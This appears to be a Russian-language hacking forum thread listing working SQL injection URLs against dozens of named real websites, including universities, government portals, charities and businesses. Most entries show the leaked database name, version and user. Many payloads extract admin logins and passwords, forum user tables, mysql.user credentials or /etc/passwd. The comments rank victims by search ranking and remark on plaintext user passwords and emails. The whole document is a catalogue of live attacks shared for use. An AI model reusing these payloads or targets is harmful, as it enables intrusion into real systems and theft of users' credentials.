http://www.mag-project.ru/readnews.php?id=-4+union+select+1,2,3,4,concat_ws(0x3a,database(),v ersion(),user()),6,7,8,9--

b46150:5.0.81:u46150@78.108.84.71


ТИЦ: 70
PR: 5

http://www.nsj.ru/pages.php?id=-12+union+select+1,2,3,concat_ws(0x3a,database(),ve rsion(),user()),5,6,7,8--

nsj_db:4.1.22-log:nsj_mysql@10.1.36.115

http://www.mip-pamekasan-gov.com/vpage.php?id=1+and+1=0+union+select+1,concat_ws(0x 3a,user(),database(),version()),3,4,5,6--

h25765_digital@localhost:h25765_mip:5.0.51a-24+lenny1

PR 5
http://www.faset.gatech.edu/plugins/content/index.php?id=-50'+union+select+1,2,concat_ws(0x3a,username,passw ord),4,5,6,7,8,9,0,11+from+admin+limit+0,1/*
Database Version: 4.1.22-max
Database name: faset
User name: faset@localhost

http://www.amyindia.com/career.php?id=-1+union+select+1,2,concat_ws(0x3a,user(),database( ),version()),4,5,6Amyindia_amy@localhost:amyindia_ amy:4.1.22-standard

http://www.iop.harvard.edu/extension/forms/students_internships_db.php?action=id&id=-359+union+select+1,concat_ws(0x3a3a2020,version(), user(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25--

4.1.22:: iopforms_usr@cms.iop.harvard.edu:: iopforms


http://nuremberg.law.harvard.edu/php/search.php?DI=1&return=1&display_setting=10&display=1&FieldFlag=1&hits=2&ID=288&lastrec=2&ListNameID=PAuthNameID&PA_ID=b&tblList=tblPersonalAuthorsList&srch=Author&SearchType=Personal%20Author&PAuthors=-288+union+select+1,2,concat_ws(0x3a3a2020,version( ),user(),database()),4/*


5.0.45-log:: nuremberg_guest@localhost:: nuremberg 2

http://www.info.ukr.su/suggestion.php?id=-1+union+select+1,2,3,4,version%28%29,6,7,8,9,10/*

5.0.26-log :: filmsworld_info@localhost :: filmsworld_info

http://humor.zooclub.ru/anecrazdel.php?id=-1+union+select+concat_ws%280x3a,user%28%29,databas e%28%20%20%29,version%28%29%29,2,3,4,5,6,7,8,9,10, 11--

zooclub_zooclub@localhost :: zooclub_humor :: 5.0.81-community-log

http://www.mirtex.ru/?t=2&g=16+union+select+concat(0x3,user(),version() ),2/*

user:mirtexru@MIRTEX.RU
database:mirtexru
version:4.0.26


http://eco.hust.edu.cn/detail.php?tid=3&cid=7&id=3660+union+select+1,concat(0x3,user(),version() ,database( )),3,4,5,6,7,8,9,10,11,12,13,14

admin@10.10.4.199 5.1.6-alpha-nt-maxeco

http://www.rider.by/news.php?id=-9+union+select+1,2,3,concat(0x3,hash),5+from+admin sessions--

PR: 6

http://www.cittadellarte.it/readnews.php?id=-382+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,concat_ws(0x3a,database(),versio n(),user()),22--

cittadellarte:4.1.10a:cittadella@arwen.mymcomm.int ra




http://www.niuage.fr/post.php?id=-7+union+select+1,concat_ws(0x3a,database(),version (),user()),3,4,5,6,7--

niuagedesign:5.0.68-log:niuagedesign@10.0.78.87




http://gymn2samara.org/readnews.php?id=-32+union+select+1,2,3,concat_ws(0x3a,database(),ve rsion(),user()),5,6--

gymnsama_mt:5.0.77-community-log:gymnsama_mt@localhost




http://gameborder.mobi/readnews.php?id=2672+union+select+concat_ws(0x3a,d atabase(),version(),user()),2,3--

gamebord_games:5.0.83-community:gamebord_user@localhost




http://www.foshankids.cn/readnews.php?id=-844+union+select+1,2,3,concat_ws(0x3a,database(),v ersion(),user()),5,6--

foshankids_www:5.0.22:foshankids@localhost

http://mmoworld.ru/user_info.php?id=1'+and+substring(version(),1,1)=5 +--+

http://neoklimat.ru/faq.php?id=-923+union+select+1,concat_ws%280x3a,database%28%29 ,version%28%29,user%28%29%29,3,4--

5.0.67-log :: u98256_woll :: u98256@10.10.153.185

http://www.bsk.ru/news.php?id=45+union+select+1,2,3,4,unhex%28hex%28 concat_ws%280x3a,version%28%29,database%28%29,user %28%29%29%29%29,6+limit+1,1/*
version():4.1.13-log
database():bsknew
user():BSK@localhost

http://www.amrita.edu/jobs/job-details.php?recordID=-4+union+select+username,user_password,3,4+from+php bb_users+limit+1,1/*

Ветка 4

http://www.shyla.ru/shvmz.php?id=-1+union+select+1,2,3,4,5,6,concat_ws%280x3a,databa se%28%29,version%28%29,user%28%29%29,8,9--

shyla :: 5.0.84 :: zab@localhost

PR - 5
http://neuroscience.columbia.edu/postdoctoral.php?ID=2+union+select+1,2,3,unhex(hex (version())),5/*

Database Version: 4.1.8-standard
Database name: neuro_init
User name: dgl2102@localhost

PR - 4
http://www.stroudsymposia.org/transcripts/?transID=-251+union+select+unhex(hex(group_concat(user,0x3a, password))),2,3,4,5,6,7,8,9+from+mysql.user/*

Database Version: 4.1.8-standard
Database name: stroud
User name: jhy2104@localhost


PR - 6
http://web.neuro.columbia.edu/members/Test3.php?id=-23+union+select+1,2,3,version(),5/*

Database Version: 5.0.32-Debian_7etch6-log
Database name: members
User name: membersdb@neuroinstitute.org

pr-3

http://audioschool.ru/ser_ver/index.php?new=-2+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(group_c oncat(username,0x3a,password,0x0a),0x71),0x71),4+F ROM+u82696.audio_users--

Database Version: 5.0.67-log
Database name: u82696
User name: u82696@10.10.223.245

PR 6
http://www.hiram.edu/news/article.php?id=-1681+union+select+1,version(),3,4/*

Database Version: 5.0.45
Database name: hiram
User name: root@hiramw1.hiram.edu

PR 6, ТИЦ 20
http://gov.ai/department.php?id=1&dept=-7+union+select+1,2,3,4,aes_decrypt(aes_encrypt(con cat_ws(0x3a,user,password),1),1)+from+mysql.user--
PR 6
http://www.petsmartcharities.org/adopt/story.php?id=-56+union+select+1,2,3,4,5,6,7,8,9,10,concat_ws(0x3 a,database(),version(),user()),12,13,14,15,16,17,1 8,19,20--
PR 5
http://www.epc.ac.uk/current/diary/story.php?id=-56+union+select+1,concat_ws(0x3a,database(),versio n(),user()),3,4,5,6,7,8,9--
PR 4
http://www.vaughantoday.ca/story.php?id=-1857+union+select+1,concat_ws(0x3a,database(),vers ion(),user()),3,4,5,6,7,8,9,10,11,12--
PR 4
http://www.surfingqueensland.com/news.php?id=36+union+select+11111,22222,concat_ws( 0x3a,database(),version(),user()),444444+limit+1,1--

PR5
http://www2.und.nodak.edu/our/news/story.php?id=2770%27%20union%20select%201,concat_w s(0x3a,version(),user(),database()),3,4,5,6,7,8,9, 10%20--%20-

5.0.44sp1-enterprise-gpl-log:our@localhost:our

PR5
http://underground.und.edu/category.php?id=0+UNION+SELECT+concat_ws(0x3a,USER ID,USERNAME,password),2,3,database(),user(),5,6,7, 8,9,10,11+FROM+USERS+--+-

http://glokomkatarakt.dergisi.org/content.php3?id=1+union+select+1,2,3,4,concat_ws(0 x2a,user(),0x2a,version(),0x2a,database() ),6,7/*

pleksus@lo 4.0.24 JOURNAL_gl

Google PR:7
Yandex CY:130

http://www.slu.edu/jobs/job_details.php?i=8815+and+substring(version(),1,1 )=3--+&d=1313jd

http://www.w3s.ru/service_more.php?service_id=5&project_id=-78+union+select+1,2,concat_ws(0x3a,user(),version( )),4,5,6,7,8,9,0,11,12--

ТИЦ 850
PR 7

http://love.sibnet.ru/list/?sex=3+union+select+1,2,3,4444,5,6,7,8,9,10,1,2,3, 44444,5,6,7,8,9,10,1,2,3,123123123213,5,6,7,8,9,10 ,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4 ,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9--+

PR: 5
http://www.saiuae.gov.ae/newsidar.php?id=1+and+substring(version(),1,1)=3+--+

http://www.maya-balashova.ru/index.php?type=-559+union+select+concat_ws(0x3a,user(),version(),d atabase())&idNews=33


mayabala@fe34.hc.ru:4.1.22-log:wwwmayabalashova


Смотрим страницу "создание сайта", видим авторов, вбиваем в гугль и находим другой сайт.

http://www.recordnn.ru/?type=-8+union+select+concat_ws(0x3a,user(),version(),dat abase())

recordnn@fe20.hc.ru:4.1.22-log:wwwrecordnnru


Админку не нашел :(

http://www.energypoplar.eu/pillar.php?p=-1+union+select+1,2,3,4,concat_ws(0x3a3a,id,nom,pwd )+from+bc_admin+--+
===================

http://www.usil.ru/event.php?action=detail&id=-68+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,datab ase(),version(),user()),9,10,11--

usil:4.1.22-log:dbusil@localhost




http://life.gubkin.ru/event.php?id=-4+union+select+1,2,3,4,5,concat_ws(0x3a,database() ,version(),user()),7--

life:5.0.84-log:life@localhost




http://www.ufrs-ra.ru/newsone.php?n_id=-9+union+select+1,2,concat_ws(0x3a,database(),versi on(),user()),4,5--

ufrs-ra:5.0.24a-log:ufrs-ra@localhost




http://www.cpu2.com/readNews.php?id=-21+union+select+1,concat_ws(0x3a,database(),versio n(),user()),3,4--

cpu2:5.0.67.d7-ourdelta-log:cpu2@72.167.232.52




http://barnsleytalk.co.uk/news/readnews.php?id=-95+union+select+1,2,concat_ws(0x3a,database(),vers ion(),user()),4,5--

barnsley-talk_main:5.0.27-Debian_0.dotdeb.1:barnsley-talk_main@localhost

http://www.arteutile.net/art_holiday/one_list.php?country=0%AEion=3&city=0&village=0&sType=0&pool=1+union+select+1,concat_ws(0x3,user(),0x3,dat abase(),0x3,version()),3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19/*

bonoraa@localhost-bonoraa-4.1.18

http://www.hagiang.gov.vn/admin/advertisementview.php?key=0+union+select+concat(0x 2a,version(),user(),database()),2,3,4,5,6,7,8,9,10 ,11,12,13,14,15+limit+1,1

4.1.22-community-ntroot@localhosthagiang

PR 4
http://players.union.rpi.edu/shows/shows.php?id=-19+union+select+1,2,3,4,5,6,7,8,9,0,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28/*

Database Version: 5.0.22-Debian_0ubuntu6.06.3-log
Database name: players
User name: players@websrv.union.rpi.edu

http://www.j-tour.ru/?mod=SiteNews&act=7&id=-1+union+select+1,concat_ws(0x3a,login,PASSWORD),3, %20%204,5,6+from+ssp_AdminSet--+

http://showatelier.ru/?mod=SiteNews&act=7&id=-1+union+select+1,concat_ws(0x3a,login,PASSWORD),3, %20%204,5,6+from+ssp_AdminSet--+

http://mek-kuechen.ru/foto.php?open=%27+union+select+1,concat_ws(0x3a,lo gin,pswd,mail,description),3,4,5,6,7+FROM+adminuse rs+--+-

http://mek-kuechen.ru/foto.php?open=%27+union+select+1,concat_ws(0x3a,ve rsion(),user(),database(),table_name,column_name), 3,4,5,6,7+FROM+INFORMATION_SCHEMA.columns+WHERE+ta ble_name=0x61646d696e7573657273+--+-

5.0.51a-24+lenny1-log:nikig_mek@77.221.130.16:nikig_mek

US : http://www.newsdesk.umd.edu [Oracle-Inj]

PR = -1
тИЦ = 50

http://www.newsdesk.umd.edu/uniini/release.cfm?ArticleID=-1+UNION+SELECT+null,to_char%28111%29,to_char%28222 %29,to_char%28333%29,to_char%28444%29+FROM+ARTICLE INFO

http://pct.edu.vn/tinbmdetail.php?id=-65+union+select+1,2,version(),4,5,6,7,8,9/*

Database Version: 4.1.20
Database name: ptth_pct
User name: ptthpct@localhost

http://www.swanbell.com/site/index.php?page_id=98+union+select+concat_ws(0x2a,v ersion(),user(),database()),2,3,4,5,6,7,8,9/*

45-log*swanbe_com@s2844@s31.loopia.se*swanbell_com'

http://www.soniagandhi.org/php/showPicture.php?linkid=6&galleryid=10&category=2+union+select+1,concat(0x3,user(),databa se(),version()),3+limit+1,1

soniagan_sonia@localhostsoniagan_soniagandhiorgdb4 .1.22-standard-log

http://www.mangosdancers.com/search-public/sp.php?id=1'+and+substring(version(),1,1)=5/*
#####################################

что то типа того же =\
http://www.colombianconnection.com/search/sp.php?id=1+and+substring(version(),1,1)=4/*

#####################################
PR 4

http://www.wostep.ch/index.php?id=-1'+union+select+1,2,concat_Ws(0x3a,user(),database (),version()),4,5/*&lang=en

web193@localhost:usr_web193_1:5.0.45
#####################################
http://www.kco.unibe.ch/daten_e/suchen/page.php?id=-1'+union+select+1,2,concat_Ws(0x3a,user(),database (),version()),4,5+--+

studadmincon@iml-studmed01.unibe.ch:studmed_kinderchirurgie:5.0.77-log

####################################
http://www.lepramission.ch/index.php?id=1+and+substring(version(),1,1)=4--

####################################
http://www.qbik.ch/usb/devices/showdevcat.php?id=1+and+substring(version(),1,1)=5--
####################################
http://www.travelclaudine.ch/travel/unknown1.php?id=-1'+union+select+1,concat_Ws(0x3a,user(),database() ,version()),3,4,5+--+

travelclaudine@localhost:travelclaudine:5.1.34

http://knebel.net/index.php?req=view_cat&catid=-14+union+select+1,2,version(),4/*

Database Version: 5.0.45-community
Database name: knebel_db1647a
User name: knebel_us1647a@localhost

http://golden-hotel.msk.ru/anapa.php?pid=-1+union+select+version()/*



http://www.2r2c.coop/2r2c/index.php?le_num_rub=-3+union+select+concat_ws(0x3a3a,num_admin,login,pa ssword),2,3,4,5,6,7+from+admin+limit+1,1+--+

http://realcoder.com.ru/news.php?id=-5+union+select+1,2,3,concat_ws(0x3a,name,pass),5,6 ,7+from+users--
http://realcoder.com.ru/admin.php


реальный кодер йопт ))))

ТИЦ: 130
PR: 4

http://www.gps-sport.ru/competition/event.php?id=-8+union+select+1,2,3,concat_ws(0x3a,database(),ver sion(),user()),5,6,7,8--

gpssport:5.1.29-rc:gpssport@localhost
http://www.gps-sport.ru/admin


ТИЦ: 110
PR: 4

http://www.javaportal.ru/books/aboutbook.php?id=-18+union+select+1,2,concat_ws(0x3a,database(),vers ion(),user()),4,5,6,7,8,9,10,11,12--

javaport_frum:4.0.27-max-log:javaport_frum@v15.valuehost.ru




http://prodol.ru/vacancy/preview.php?id=-5939+union+select+1,2,3,concat_ws(0x3a,database(), version(),user()),5,6,7,8,9,10,11--

rvs:5.0.67-log:rvs@localhost

http://latts.in2p3.fr/siteuk/eq_1_ch.php?Id=1&Ch=-148'+union+select+1,2,3,concat_ws(0x3a,user(),data base(),version()),5,6,7,8,9,10,11,12,13,14,15,16,1 7,18,19,20,21,22,23,24,25,26,27+--+

latts_admin@ccwbdir01.in2p3.fr:lattspublic:5.0.67-log

http://www.itfdergisi.com/content.php3?id=33+union+select+1,concat(0x2a,vers ion(),database()),3,4,5,6,7,8,9,10,11,12,13


http://www.cdlgroup.com/showPage.php?page=23+union+select+1,2,3,concat(0x2 a,user(),version(),database()),5,6,7,8,9+limit+1,1

cdlwebsite@localhost5.0.22-Debian_0ubuntu6.06.10-log


http://www.koleso.ru/index.php?pageId=45+union+select+1,2,3,concat_ws(0 x3,version(),database(),user()),5,6,7+limit+1,1

5.0.45-log koleso koleso@localhost

http://www.photoworld.kz/index.php?mod=photos&cathid=-25+union+select+1,concat_ws(0x3a,login,pwd),3,4,5, 6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23, 24,25,26,27,28,29,30,31,32,33,34,35,36+from+auth--+

PR 5
http://daedalus.caltech.edu/people/peep-info.php?id=-0020+union+select+1,2,3,4,5,version(),7,8,9,0,11/*

Database Version: 5.0.45
Database name: atwater
User name: external@localhost

---------------------------------------------------------------------------------------------------------------------------------

http://www.swiss.org.nz/page.php?ID=-73+union+select+1,2,3,version(),5,6,7,8,9,0,1,2,3, 4/*

4.1.22-standard-log

---------------------------------------------------------------------------------------------------------------------------------

PR 5
http://www.aradergalleries.com/catgallery.php?id=-2+union+select+1,password,3,4+from+users/*

Database Version: 4.1.22-standard
Database name: arader_gallery
User name: arader_webuser@localhost

http://www.cse.secs.oakland.edu/job_details.php?id=-25+union+select+1,version(),3,4,5,6,7,8,9--+

5.0.51a-3ubuntu5.4-log

PR 5
http://www.franksco.com/news/events/story.php?id=-1+union+select+1,concat_ws(0x3a,database(),version (),user()),3,4,5--
PR 5
http://www.christthekingdiocese-anglican.org/theme.php?id=-1+union+select+1,2,concat_ws(0x3a,database(),versi on(),user()),4,5,6,7,8,9,10--
PR 4
http://www.flyfishinginmaine.com/story.php?id=-1+union+select+concat_ws(0x3a,database(),version() ,user()),2,3,4,5,6,7,8,9--
PR 4
http://www.thewoodstockindependent.com/obituaries/story.php?id=-1+union+select+1,concat_ws(0x3a,database(),version (),user()),3--

http://sebastianhomeier.de/news.php?id=-1+union+select+1,2,3,4,5,concat_ws(0x3a,version(), database(),u ser())/*
Version: 4.1.22-standard
Database: adm3414_cms
User name: adm3414_admin@localhost

http://softsfera.ru/news.php?id=-1+union+select+1,2,3,concat_ws(0x3a,version(),d atabase(),user())/*
Version: 5.0.27
Database: softsfera_1
User name: softsfera_1@localhost

http://mansvu.mans.edu.eg/pm/forms/frm_worker_overview.php?worker_id=33&project_id=25+union+select+1,concat(0x2a,version() ,user(),database()),3,4,5,6,7,8,9,10,11,12,13,14

5.0.51a-24+lenny1elu@10.10.200.1project_management

http://www.flying-revolver.net/main.php?page=tipp&tipp_id=1392+union+select+1,concat(0x3,version(),d atabase(),user()),3,4,5,6,7,8,9,10,11,12,13/*

4.1.15-Debian_1-logusr_web28_1web28@localhost

http://www.magazinmagazinov.ru/service/item.php?page=1&id=-91+union+select+1,2,concat_ws(0x3a,user,password), 4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 ,23,24,25,26,27,28,29+from+mysql.user+--+

http://lenta.bt-lady.com.ua/index.php?id=1+and+substring(version(),1,1)=4--

ТИЦ: 1600
PR: 4

http://www.heavymusic.ru/labels.php?id=-1+union+select+1,concat_ws(0x3a,database(),version (),user()),3,4,5--

u90911:5.0.67-log:u90911@10.10.153.195



http://www.vashidengi.ru/newsdetail.php?id=58+union+select+1,2,3,4,concat_w s(0x3a,database(),version(),user())--

wwwvashidengiru:4.0.26:vashiden@fox.hc.ru



http://www.leika.ru/pages/articles.php?item_id=-57+union+select+1,2,3,concat_ws(0x3a,database(),ve rsion(),user()),5,6,7,8,9,10,11--

db_leika1:4.0.27-standard:leika1@localhost

PR 6http://ohiolearns.org/catalog/displaydegree.php?id=-415+union+select+concat_ws(0x3a,username,password) ,2,3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20,2 1,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37, 38,39,40,41,42+from+users/*

Database Version: 4.0.26-Max
Database name: catalog
User name: dbdev@192.168.1.162

--------------------------------------------------------------------------------------------------------------------------------

http://www.oldvictheatre.com/whatson.php?id=-47+union+select+1,version(),3,4,5,6,7,8,9,10/*

Database Version: 5.0.27-log
Database name: oldvic
User name: oldvic@cl-web-01.connectinglondon.com

-----------------------------------------------------------------------------------------------------------------------------------

PR 5
http://www.rajagiri.edu/php/showFaqContent.php?id=-8+union+select+1,version(),3,4/*

Database Version: 4.1.22-community
Database name: db1565
User name: c3542@ns104.fastdnsservers.com

Поздравляем грузию с годовщиной.

Сайт грузинской армии.
SQL-inj
http://ajl.ge/pages.php?lang_id=geo&cat_id=1&news_id=-16%20UNION%20SELECT%201,2,CONCAT_WS(CHAR(32,58,32) ,writer_id,name,nick,pass,picture,email,allowe),4, 5,6,7,8,9,10,11%20FROM%20writers

http://insta.ge/index.php?pg_n=0&id=-6+union+select+CONCAT_WS(CHAR(32,58,32),id,user,pa ss)+FROM+admins

http://www.bytten.com/gamereview.php?id=-227+union+select+1,2,3,4,version(),6,7,8,9,0,1,2,3 ,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8 ,9,0,1,2,3,4,5,6,7,8,9,0,1,52/*

Database Version: 5.0.45-log
Database name: db23338146
User name: db23338146@localhost

-------------------------------------------------------------------------------------------------------------------

http://www.recurrencies.com/test/project.php?pid=-2+union+select+version()--

Database Version: 5.0.67-community-log
Database name: recurren_recur
User name: recurren@localhost

http://www.gulhanemedicaljournal.org/content.php3?id=1+union+select+1,concat_ws(0x2,use r(),version(),database()),3,4,5,6,7,8,9,10,11,12,1 3+limit+1,1

http://investincotedazur.com/en/newsletter/index.php?numID=199+union+select+1,2,3,4,concat_ws (0x3a,version(),user(),database()),6,7,8,9,10,11/*

4.0.15:tca_admin@localhost:tca_news

http://www.gingliders.com/paragliding/showdetails.php?id=-109+union+select+1,version(),3,4,5,6,7--

Database Version: 5.0.81-community-log
Database name: ginglide_newsen
User name: ginglide_news@localhost

http://www.fota.co.uk/news.php?action=showArticle&params[id]=-958%20union%20select%201,concat_ws(0x3a,id,usernam e,password,access),3,4,5,6,7,8,9,10,11,12,13,14,15 %20from%20users%20limit%201,1--

http://www.unionlabelgroup.com/bandsview.php?id=11+UNION+SELECT+1,2,3,concat_ws(0 x3a,database(),version(),user()),5,6--

unionlab_admin:5.0.51a-community:unionlab_admin@localhost



http://www.caritas-hagen.de/aktuelles.php?id=11+union+select+1,concat_ws(0x3a, database(),version(),user()),3,4,5,6,7,8--

d006891d:4.0.25-Max-log:d006891d@85.13.134.192

http://www.chbabc.org/content.php?id=11+and+substring(version(),1,1)=4/*

PR 4
http://crprod.teiep.gr/news.php/downloads/downloads/news.php?sa=view_new&id=-20+union+select+1,2,concat_ws(0x3a,database(),vers ion(),user()),4,5,6

db_fitikis:5.0.22-community-nt-log:root@localhost

PR 5
http://www.footballdatabase.com/index.php?page=player&Id=-1771+union+select+1,2,concat_ws(0x3a,database(),ve rsion(),user()),4,5,6,7,8+--+&pn=Ayhan_Akman

nhosko80_footballdatabase:5.0.77-community:nhosko80_footdb@localhost

http://www.joaoluizcorrea.com.br/fotos.php?album=-271+union+select+1,concat_ws(0x3a,user(),database( ),version()),3,4

joaoluizcorrea@200.234.200.160:joaoluizcorrea:4.1. 22-locaweb-log

http://www.turkjcancer.org/content.php3?id=1+union+select+1,concat_ws(0x2,use r(),version(),database()),3,4,5,6,7,8,9,10,11,12,1 3/*

http://www.fusabil.org/similar.php3?id=111+union+select+1,concat(0x2,vers ion(),user(),database())+limit+1,1/*

http://www.wciu.com/video.php?assetID=1+union+select+concat(0x3,versio n(),user(),database()),2,3,4,5,6+limit+1,1/*

5.0.45datacontent@70.32.76.155wciu_content

http://www.cc.lu/index.php?page=54+and+substring(@@version,1,1)=5.0
version 5.0
user cdc@localhost
database cdc

http://www.oldseds.co.uk/seds/results.php?id=999999999999999+union+select+concat _ws(0x3a,version(),database(),user()),2,3,4,5,6,7, 8--
5.0.68-percona-3-log:heartsfc:heartsfc@linweb4.atlas.pipex.net
http://www.oldseds.co.uk/seds/results.php?id=999999999999999+union+select+concat _ws(0x3a,username,user_password,user_level),2,3,4, 5,6,7,8+from+phpbb_users+limit+1,1--============================================
http://www.mereducation.com/resources/item.php?id=-1+union+select+1,2,3,concat_ws(0x3a,version(),data base(),user()),5,6,7
5.0.22-standard-log:mered_live:mereduser@leda.cohasset.com
http://www.mereducation.com/resources/item.php?id=-1+union+select+1,2,3,concat_ws(0x3a,username,passw ord,email),5,6,7+from+users======================= =====================
http://www.weathersentinel.com/search/results.php?id=55+union+select+1,2,3,concat_ws(0x3 a,version(),database(),user())
5.0.45:weathers_search:weathers_user@localhost
http://www.weathersentinel.com/search/results.php?id=55+union+select+1,2,3,concat_ws(0x3 a,adminuser_firstname,adminuser_email,adminuser_pa ss)+from+adminuser================================ ============
http://www.gojumbos.com/results.php?id=-170+union+select+1,2,3,concat_ws(0x3a,version(),da tabase(),user())
5.0.81-community-log:tuftsxcc_tuportal:tuftsxcc@localhost
http://www.gojumbos.com/results.php?id=-170+union+select+1,2,3,concat_ws(0x3a,username,use r_password,user_level)+from+tuftsxcc_phpbb.phpbb_u sers
http://www.gojumbos.com/results.php?id=-170+union+select+1,2,3,concat_ws(0x3a,user_login,u ser_pass,user_status)+from+tuftsxcc_wrdp1.wp_users ============================================
http://www.raahauges.com/view-results.php?id=9999999999999+union+select+1,2,3,co ncat_ws(0x3a,version(),database(),user())5.1.34-community:raahauges_com_cms:raahauge_cms@raptor13. nextmill.net
============================================http://www.natickwrestling.com/results.php?id=-12+union+select+1,2,3,4,concat_ws(0x3a,version(),d atabase(),user()),6
5.0.67-log:db271766403:dbo271766403@74.208.16.227
============================================http://emg-zine.com/item.php?id=-396+union+select+1,2,3,4,5,6,7,8,unhex(hex(concat_ ws(0x3a,version(),database(),user()))),10,11,12,13 ,14,15,16,17,18,19,20,21,22,23,24,25,26
4.1.16-standard-log:readly:emgzinefans@sanjay.dreamhost.com
============================================http://namos.cg.yu/pregled.php?id=9999999999999999+union+select+unhex (hex(concat_ws(0x3a,version(),database(),user()))) 4.1.12:namos_co_me_-_emi:namos@localhost

PR5

http://www.edenslostandfound.org/home/preview.php?id=-30+union+select+1,2,3,4,concat_ws(0x3a,database(), version(),user()),6,7,8,9,10--

edensl:5.0.24:edensl@localhost




Ассоциация специалистов по недвижимости Украины

http://www.cbn-cp.com/preview.php?id=-147+union+select+1,2,concat_ws(0x3a,database(),ver sion(),user()),4,5,6,7,8,9,10,11,12,13,14--

alexk_comprop:5.0.81-log:alexk@first.hosted.in



ещё риелторы

http://realtygroup.com.ua/preview.php?id=-34+union+select+1,2,concat_ws(0x3a,database(),vers ion(),user()),4,5,6,7,8,9,10,11,12,13,14,15--

realtygr_comprop:5.0.81-log:realtygr@second.hosted.in




http://www.kvartira.kiev.ua/preview.php?id=-7+union+select+1,concat_ws(0x3a,database(),version (),user()),3,4,5,6--

bzbunsky_apart:5.0.51a-log:bzbunsky_root@localhost

<black_vidslibcom@localhost:4.1.22>
http://vidslib.com/index.php?view=-1%27+union+select+1,concat_ws(0x3a,user(),version( )),3,4,5,6,7,8,9,10,11,12,13,14,15+--+

<admin@localhost:5.0.45>
http://mudb.suicidalgoldfish.com/view.php?id=-1+union+select+1,2,3,concat_ws(0x3a,user(),version ()),5,6,7,8,9,10,11,12,13,14+--+

<trailers2@77.232.66.11:5.0.51a>
http://trailers.thefunplanet.com/view.php?id=-1+union+select+1,concat_ws(0x3a,user(),version()), 3,4,5,6,7,8+--+

http://www.vercon.bt/directory/user_details.php?id=1+union+select+1,2,3,4,5,conca t_Ws(0x3a,user(),database(),version()),7,8,9,10,11 ,12,13,14,15,16,17--

verconDBUser@localhost:vercon:5.0.83

http://powercorridor.com/php/showNewsItem.php?news_id=-22+union+select+1,2,3,4,5,6,7,8,9,10,11,12,concat_ ws(0x3a,admin_id,user_name,password)+from+administ rator--

http://www.day.gov.cn/Detail.php?id=107+union+select+concat(0x3a,version (),user(),database()),2/*

5.0.45-community-ntdayi@dbhostdayi

http://yarich.ru/production/?s=&page=&id=-65'

Database Version: 5.0.45
Database name: yarich
User name: root@localhost

http://yarich.ru/production/?s=&page=&id=-65+UNION+SELECT+1,CONCAT(0x7873716C696E6A626567696 E,(SELECT+CONCAT(username,0x7873716C696E6A64656C,u ser_password,0x7873716C696E6A64656C,user_level)+FR OM+yarich.users+LIMIT+0,1),0x7873716C696E6A656E64) ,3,4,5,6/*

http://www.bme.jhu.edu/people/primary.php?id=-393+union+select+1,2,3,4,5,6,7,8,9,0,11,12,13,14,1 5,16,17,18,19,20,21,22,version(),24,25,26,27/*

Database Version: 5.0.45
Database name: bme
User name: bmeweb@localhost

http://www.french-e-girls.com/girl.php?id=2-3%20union%20select%201,concat_ws(0x3a,iduser,login ,password,email,enddate,suspended),3,4,5,6,7,8%20f rom%20userccbill%20limit%201,1--

Опять же все пользовательские пароли с мыльниками в открытом виде даже некоторые подходят к мылам


____________

http://www.aramis-london-escorts.co.uk/girl.php?id=2-5%20UNION+SELECT+1,group_concat(column_name),3,4,5 ,6,7,8,9,10,11,12,13,14,15,16%20from%20information _schema.columns%20where%20table_name=0x6573636f727 473%20--

Версия 5

_______________

http://www.sweet-e-girls.com/girl.php?id=2-1%20union%20select%201,2,3,concat_ws(0x3a,login,pa ssword),5,6,7,8%20from%20user%20--

Чето меня на порно сайты потянуло 3 подряд.... хех тут кстати тоже все пароли в OPEN

http://www.kent.fire-uk.org//playmovie.php?contid=-40+union+select+1,concat_ws(0x3a,user(),version(), database()),3,4,5,6,7,8,9,10/*
kentfire@medwaypctdemo.netsite.co.uk:5.0.22:KFRSLi ve

http://www.msop.avtograd.ru/people.php?action=show&id=1-1%20union%20select%201,2,concat_ws(0x3a,username,u ser_password),4,5,6,7,8,9,10,11,12,13,14,15,16,17, 18%20from%20phpbb2_users%20limit%201,1--

Вот и пасс от форума только в хеш -(( а на форуме бд н а 36 000 человек..

PR 5

http://www.kyfestivals.com/details.php?id=-125'+union+select+1,load_file('/etc/passwd'),3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3 ,4,5,6,7,8,29+from+mysql.user/*

Database Version: 4.1.22
Database name: kyfestivals
User name: setel@localhost

PR6
http://www.cckc.gov.cn/cckc/lnw/news_view.php?id=2+union+select+1,load_file(0x2f65 74632f706173737764),3,4,5,6,7--
Database Version: 5.0.75-0ubuntu10
Database name: cckc2005_lnw
User name: cress@localhost

http://www.kbb-forum.net/journal/content.php3?id=21+union+select+1,concat(0x2,datab ase(),user(),version()),3,4,5,6,7,8,9,10,11,12+lim it+1,1

http://www.universaledition.com/truman/en_templates/view.php3?f_id=17+union+select+concat_ws(0x3,versi on(),user(),database()),2

5.0.32-Debian_7etch8-log www@localhost truman

http://kryolan.s10.omatix.de/en/index.php?mnu=612&id=35+limit+0+UNION+SELECT+1,CONCAT(version(),data base(),user()),3,4--

database Version: 5.0.32-Debian_7etch8-log
database name: kryolansql1
user name: kryolansql1@localhost

http://www.gripskateshop.co.uk/index.php?ID=35+limit+0+UNION+SELECT+1,CONCAT(vers ion(),database(),user()),3,4,5,6--

database Version: 5.0.82-community
database name: web36-user-2
user name: web36-user-2@localhost

http://pescaderiascorunesas.es/gran_cocina/autor/?id=-13+union+select+1,2,3,4,CONCAT(version(),database( ),user()),6,7,8,9--

4.1.25-Debian_mt1db25093_pescaderiasdb25093@64.13.232.33

PR 8
